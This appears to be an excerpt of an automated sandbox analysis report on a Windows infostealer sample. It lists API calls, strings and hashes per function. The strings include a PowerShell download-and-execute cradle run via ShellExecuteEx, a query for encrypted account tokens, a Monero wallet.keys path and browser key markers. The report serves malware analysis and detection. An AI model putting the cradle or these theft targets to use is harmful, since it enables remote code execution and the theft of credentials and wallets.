                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 2feafb79ffe67a0c408f58fcaba1926669f7b2c33b51bc3f8fc06eecd80eac37
                        • Instruction ID: 669cdf20eff9b473f16aa133f15864c74aec820327530ad87e08781e47a73c17
                        • Opcode Fuzzy Hash: 2feafb79ffe67a0c408f58fcaba1926669f7b2c33b51bc3f8fc06eecd80eac37
                        • Instruction Fuzzy Hash: 89B150759101089BDB14EBA1CC96EEE7338BF54302F444269F906B2191EF346E8DEB66
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: f9d90880eb01b7b61ee1545441443ab6a3b5aa6b67e6adda5dba22b8ba2029c6
                        • Instruction ID: b325016ee68c54c5fc094fab0e4deb04cd9161abe2c36bdeb7cf649d6ce5e808
                        • Opcode Fuzzy Hash: f9d90880eb01b7b61ee1545441443ab6a3b5aa6b67e6adda5dba22b8ba2029c6
                        • Instruction Fuzzy Hash: 67F08934904209EFE3449FE1E90972C7B70FB08703F0801ABF60DA7290D6754B85EB96
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C44FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C44FD1
                        • InternetOpenA.WININET(00C60DDF,00000000,00000000,00000000,00000000), ref: 00C44FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C45011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C45041
                        • InternetCloseHandle.WININET(?), ref: 00C450B9
                        • InternetCloseHandle.WININET(?), ref: 00C450C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 7d38e18293d59a7d22bda52ae20b3011e3628c4ca4698a0c45ae5c6f7c3e53e9
                        • Instruction ID: 5ca092b3b12aa23880974b86ea9e7f1093c330cf754185002d7ce4b392d646c1
                        • Opcode Fuzzy Hash: 7d38e18293d59a7d22bda52ae20b3011e3628c4ca4698a0c45ae5c6f7c3e53e9
                        • Instruction Fuzzy Hash: 5E3106B4A00218ABDB20CF55DC85BDDB7B4FB48704F5081E9EA09B7281D7706EC99F99
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C58426
                        • wsprintfA.USER32 ref: 00C58459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C5847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C5848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C58499
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,008A0000,00000000,000F003F,?,00000400), ref: 00C584EC
                        • lstrlen.KERNEL32(?), ref: 00C58501
                        • RegQueryValueExA.ADVAPI32(00000000,0089FF40,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C60B34), ref: 00C58599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C58608
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C5861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 98d7546e327cbaaa89224797ac3b4d76885264f9de6982ce038ed3293366bccd
                        • Instruction ID: 9fe61e4ff0df24f882487acf3a0abb3ed00495cb01e3a9497c35cb63d0046267
                        • Opcode Fuzzy Hash: 98d7546e327cbaaa89224797ac3b4d76885264f9de6982ce038ed3293366bccd
                        • Instruction Fuzzy Hash: A5210AB59002189FEB24DB55DC85FE9B3B8FB48701F04C5A9A609A6140DF71AAC9CFE4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C576A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C576AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0088E2E8,00000000,00020119,00000000), ref: 00C576DD
                        • RegQueryValueExA.ADVAPI32(00000000,008A0180,00000000,00000000,?,000000FF), ref: 00C576FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C57708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 5cfae272781e366d1aeb322ceafdb95519ff4bcfa997aaa41a3d30725febdd1f
                        • Instruction ID: f69688e7c8f5af68dd57e5205784a1c8e8f1e28e84e15af9b590b8255b0cd908
                        • Opcode Fuzzy Hash: 5cfae272781e366d1aeb322ceafdb95519ff4bcfa997aaa41a3d30725febdd1f
                        • Instruction Fuzzy Hash: 6A0184B8A00204BFEB00DBE1EC4DF6D77B8EB08701F144166FE08E7190D67499488B51
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C5773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0088E2E8,00000000,00020119,00C576B9), ref: 00C5775B
                        • RegQueryValueExA.ADVAPI32(00C576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C5777A
                        • RegCloseKey.ADVAPI32(00C576B9), ref: 00C57784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 79175fda7d8247d2aef6d7fd185572efd443347d595e77d79b95005d79a91470
                        • Instruction ID: 11da7af5c504e619c141e7fff7ca11e27b21054f14c1629c8e7654ac6c0ffd6d
                        • Opcode Fuzzy Hash: 79175fda7d8247d2aef6d7fd185572efd443347d595e77d79b95005d79a91470
                        • Instruction Fuzzy Hash: 9C01A7B9A00308BFE710DBE1DC4AFAEB7B8EB08701F044166FA08B7281D67056448B61
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                        • LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 47f854c056441461643bcf03cc5ab84e49a89767a0588cc11824023c20aa800b
                        • Instruction ID: c04c975929a4f1438bf1b9a527b765d3f723c39e139106ec68ecc16eaec5bd1b
                        • Opcode Fuzzy Hash: 47f854c056441461643bcf03cc5ab84e49a89767a0588cc11824023c20aa800b
                        • Instruction Fuzzy Hash: 9F314BB4E00209EFDB14CF95C889BAEB7B5FF48300F148159E915A7290D778AA85DFA1
                        APIs
                        • lstrcat.KERNEL32(?,008A03C0), ref: 00C547DB
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54801
                        • lstrcat.KERNEL32(?,?), ref: 00C54820
                        • lstrcat.KERNEL32(?,?), ref: 00C54834
                        • lstrcat.KERNEL32(?,0088D6A8), ref: 00C54847
                        • lstrcat.KERNEL32(?,?), ref: 00C5485B
                        • lstrcat.KERNEL32(?,0089FB48), ref: 00C5486F
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C58D90: GetFileAttributesA.KERNEL32(00000000,?,00C41B54,?,?,00C6564C,?,?,00C60E1F), ref: 00C58D9F
                          • Part of subcall function 00C54570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C54580
                          • Part of subcall function 00C54570: RtlAllocateHeap.NTDLL(00000000), ref: 00C54587
                          • Part of subcall function 00C54570: wsprintfA.USER32 ref: 00C545A6
                          • Part of subcall function 00C54570: FindFirstFileA.KERNEL32(?,?), ref: 00C545BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 0341293669257bf2a3ef391d6c86ab6b1872b52700e98c653c9f43626d7e3c35
                        • Instruction ID: d851348fee22da481a8acd49a2a118070484ee0bc3ea90bd569f244eb21ca8fa
                        • Opcode Fuzzy Hash: 0341293669257bf2a3ef391d6c86ab6b1872b52700e98c653c9f43626d7e3c35
                        • Instruction Fuzzy Hash: 2231A2B69002086BDB14FBB0DC86EED737CBB48300F444599B719A6081EE7497CDDBA5
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C52D85
                        Strings
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C52CC4
                        • <, xrefs: 00C52D39
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C52D04
                        • ')", xrefs: 00C52CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: a822054ed8331d7c5ac381dda5d02ff4329919402cd42273e871491342201a1c
                        • Instruction ID: 3b7156c34c01fcf1ad43d60c76650ae534ccc8aaebca6be0fe5c1e36b9974fbf
                        • Opcode Fuzzy Hash: a822054ed8331d7c5ac381dda5d02ff4329919402cd42273e871491342201a1c
                        • Instruction Fuzzy Hash: EF41EE75C102089ADB14EBA2C892BDDBB74BF14301F504229E916B61D1EF742ACEDF99
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00C49F41
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 9941f96dde22c7aea7bcbb81f25b5dcf7dae8aa3cd8741fde628cd3e4b581086
                        • Instruction ID: 0793c2cb70bde1a6555305a2aafde97ef7531f73b34a334fd84b7a8299f8ae11
                        • Opcode Fuzzy Hash: 9941f96dde22c7aea7bcbb81f25b5dcf7dae8aa3cd8741fde628cd3e4b581086
                        • Instruction Fuzzy Hash: 6E616E74A00208AFDB24EFA5CC96FEE7775BF44340F048118FD0A5B191EB706A4ADB56
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0089FB68,00000000,00020119,?), ref: 00C540F4
                        • RegQueryValueExA.ADVAPI32(?,008A02B8,00000000,00000000,00000000,000000FF), ref: 00C54118
                        • RegCloseKey.ADVAPI32(?), ref: 00C54122
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54147
                        • lstrcat.KERNEL32(?,008A02E8), ref: 00C5415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 9e857970262d9881a1ff33609ad9de73ff4b2afdfe9c74dce89c955f623efa36
                        • Instruction ID: 610f229d7c120aecabc4fa881991e8b6944a918a4a0fdf24a24ccf9b20da39eb
                        • Opcode Fuzzy Hash: 9e857970262d9881a1ff33609ad9de73ff4b2afdfe9c74dce89c955f623efa36
                        • Instruction Fuzzy Hash: 924199B69101086BDB14EBA0DC4AFFE737DBB48300F044559BA1967181EA755BCC8BA2
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00C5696C
                        • sscanf.NTDLL ref: 00C56999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C569B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C569C0
